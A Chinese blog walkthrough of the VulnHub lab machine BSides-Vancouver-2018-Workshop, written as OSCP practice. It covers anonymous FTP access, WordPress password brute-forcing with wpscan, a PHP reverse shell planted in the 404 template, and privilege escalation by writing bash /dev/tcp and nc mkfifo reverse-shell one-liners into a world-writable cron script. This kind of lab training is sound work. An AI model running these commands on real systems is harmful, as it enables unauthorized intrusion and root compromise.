BSides-Vancouver-2018-Workshop,ftp匿名登录,wordpress渗透

02408

【oscp】BSides-Vancouver-2018-Workshop,ftp匿名登录,wordpress渗透

下载地址:https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova

难度:相对简单,有很多种方法

主机发现

image-20250121184853783

端口扫描

image-20250121184837955

利用ftp的默认用户进行匿名登录,查看文件

ftp 192.168.209.136
cd public
get users.txt.bk

image-20250121185447621

像是一个密码字典(其实是一个用户字典,当前系统用户包含了这些用户)

image-20250121185511101

目录扫描

image-20250121184903626

robots.txt爬虫协议

image-20250121184938264

一个wordpress站点

image-20250121185854941

继续目录扫描

image-20250121185947075

利用wpscan发现可能存在的用户名,并使用msf的字典

 wpscan --url http://192.168.209.136/backup_wordpress -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txt

image-20250121192331741

有俩个用户分别是john和admin,以及john的密码enigma

image-20250121192424354

登录进去直接修改404反弹shell的php脚本(kali自带/usr/share/webshells/php/php-reverse-shell.php)

image-20250121192721446

kali开启监听

image-20250121192903906

反弹成功

image-20250121192911253

创建交互式终端

python -c "import pty; pty.spawn('/bin/bash')"

基本信息收集,Ubuntu 12.04.4 LTS ,3.11.0-15没有内核提权漏洞,在往期的靶机中

image-20250121193303377

我们查看数据库密码(站点用到的就是mysql肯定存在mysql服务),thiscannotbeit

image-20250121193250255

登录成功

image-20250121193548594

查看用户表

image-20250121193633287

使用hash-identifier hash识别工具,识别hash类型

image-20250121193720203

md5解密

image-20250121193940421

切换思路,继续信息收集,查看文件权限为777的文件

find / -perm 777 -type f 2>/dev/null

image-20250121194759556

那么就可以直接反弹shell提权

echo '/bin/bash -i >& /dev/tcp/192.168.209.130/6666 0>&1' > cleanup
./cleanup

image-20250121195029406

kali端是有反应的,自动退出了

image-20250121195043818

换一个反弹shell命令

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.209.130 6666 >/tmp/f' > cleanup
./cleanup

image-20250121195400907

往期推荐

【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

HTB-Chemistry靶机渗透教程

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

开箱即用!265种windows渗透工具合集–灵兔宝盒

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
OSCP打靶泷羽收录
喜欢就支持一下吧
点赞8 分享
小北的头像-泷羽Sec
windows渗透操作系统-泷羽Sec
windows渗透操作系统
windows渗透操作系统
4天前 427
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具-泷羽Sec
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
4天前 412
比kali更稳定,工具更多,更加适合开发的操作系统blackarch-泷羽Sec
比kali更稳定,工具更多,更加适合开发的操作系统blackarch
比kali更稳定,工具更多,更加适合开发的操作系统blackarch
4天前 410
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1-泷羽Sec
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
4天前 408
某cms的渗透测试过程-泷羽Sec
某cms的渗透测试过程
某cms的渗透测试过程
4天前 396
XSS高级用法,SEO,挂ma,MS14_064利用-泷羽Sec
XSS高级用法,SEO,挂ma,MS14_064利用
XSS高级用法,SEO,挂ma,MS14_064利用
4天前 395
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容

OSCP介绍-泷羽Sec